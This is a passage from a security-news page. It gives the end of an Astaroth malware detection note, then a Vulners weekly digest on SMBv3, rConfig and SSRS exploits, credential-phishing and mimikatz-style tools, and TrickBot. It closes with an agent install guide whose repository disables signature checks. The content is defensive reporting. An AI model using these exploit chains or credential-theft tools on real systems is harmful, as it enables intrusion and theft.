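
Each rule on its own will fire on legitimate activity now and then; the value is in correlating several of them on one host within a short window, which is also why the chain's first step (the LNK and BAT) is worth a rule of its own in your EDR.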

Some payload components are credential-stealing plugins hidden inside the ADS of desktop.ini. Astaroth uses these plugins to steal information from compromised systems:

  • NirSoft’s MailPassView – an email client password recovery tool
  • NirSoft’s WebBrowserPassView – a web browser password recovery tool

NirSoft’s tools are well known to many threat hunters. If you have not already done so, be sure to test and explore their capabilities.
Astaroth also attempts to detect installed security products and then tries to disable them.

Vulners weekly digest #1

Brief overview of new exploits, tools and various news from the world of information security


Exploits

This month’s most famous vulnerability is CVE-2020–0796, a critical SMBv3 server/client vulnerability that affects Windows 10. A working exploit is still missing, but the patch needed to fix it is already available. An unauthenticated attacker can exploit this vulnerability to cause memory corruption, which may lead to remote code execution.
Since 2017, despite millions of dollars in losses and a ransomware epidemic, attempts to exploit the MS17–010 vulnerabilities in the SMB protocol have continued.
We recommend patching your infrastructure now rather than waiting for a working exploit to appear: apply the latest Microsoft patch for CVE-2020–0796 to Windows 10.

Checker: 
https://vulners.com/zdt/1337DAY-ID-34097
More detailed description:
https://www.kaspersky.com/blog/smb-311-vulnerability/33991/

An rConfig 3.x exploit for CVE-2020–10220 and CVE-2019–19509 was added to Metasploit.
First, the module uses CVE-2020–10220, a SQL injection, to add an admin user to the application.
Second, it authenticates as the newly created admin user and abuses a command injection in the `path` parameter of ajaxArchiveFiles in the rConfig web interface (CVE-2019–19509).

https://vulners.com/exploitdb/EDB-ID:48223

RCE in Microsoft SQL Server Reporting Services (CVE-2020–0618)
Lets the attacker craft an HTTP POST request containing a serialized object to achieve remote code execution. An account is necessary to exploit this vulnerability; the request authenticates with NTLM. The account must be assigned at least the “Browser” role on the site, a low-privilege role that only allows the user to do a few things: view folders and reports and subscribe to reports.

https://vulners.com/zdt/1337DAY-ID-34090


InfoSec tools

Pypykatz:

Every blue team has heard of mimikatz. Pypykatz is a mimikatz implementation in pure Python that runs on any OS with Python >= 3.6.
It is an actively developed open-source tool that you should test.

Fresh tool for phishing creds:

Pickl3 is a tool for phishing the credentials of the active Windows user. It can be combined with all the classic, still current phishing techniques: LNK files, DDE attacks or macros in Microsoft Office documents.

OWASP Maryam:

A new open-source OSINT tool for red teamers. If you have experience with recon-ng, it will be easy to use without any prerequisites.


COVID-19 and malware activity

The coronavirus pandemic has proven to be a blessing in disguise for APT groups and other attackers. According to a report published by Check Point Research, hackers are exploiting the COVID-19 outbreak to spread their own infections, including registering malicious COVID-19-related domains and selling them to malware creators on the dark web.
The report notes the growth in the number of malicious coronavirus-related domains registered since the start of January:

It’s amply clear that these attacks exploit coronavirus fears and people’s hunger for information about the pandemic. It is very important not to fall victim to online scams and to practise digital hygiene.
https://vulners.com/thn/THN:388DC5BD3433ABFAA4F3ADE1B130DB21

TrickBot has added new functionality: a module for brute-forcing Remote Desktop Protocol (RDP) called rdpScanDll. TrickBot is malware that has been around since 2016, starting its career as a banking trojan.
It is distributed through spam campaigns, uses new security-evasion methods and acts as a delivery vehicle for other malware such as Emotet.
More detailed information about new malware features:
https://vulners.com/thn/THN:71376C31FA1999B14811937997E9339A
TrickBot has also been spotted in the latest trend of attacks using sites about COVID-19 or coronavirus, described in a Fortinet report.

Vulnerability Management with Vulners Agents

The Vulners team has recently released new functionality for Linux vulnerability audit: Agent Scans. It is not an API that you have to wire into your own scripts, but a complete, enterprise-ready product.

IP Summary

Try it for free! To audit a CentOS 7 server with Vulners Agents, follow these steps:

  1. Add the Vulners repository. Create the file /etc/yum.repos.d/vulners.repo:
    [vulners]
    name=Vulners Agent
    baseurl=https://repo.vulners.com/redhat/el$releasever/
    enabled=1
    gpgcheck=0
    Note that gpgcheck=0 disables RPM signature verification for this repository, so the agent packages are trusted on the strength of the HTTPS connection alone.
  2. Install the Vulners agent:
    yum install vulners-agent.noarch
  3. Get an API key

    You will get key like “HXKM3OMDIYGJLJ60MPM1X51AKC3XTD9Z28J78X12T2OC2MXSTKMMBN70EBBIQUAA”

  4. Add the key to /opt/vulners/conf/vulners.conf
  5. Wait two hours or run /opt/vulners/agent.py manually
  6. Go to https://vulners.com/audit and see the results:

Continue reading “Vulnerability Management with Vulners Agents”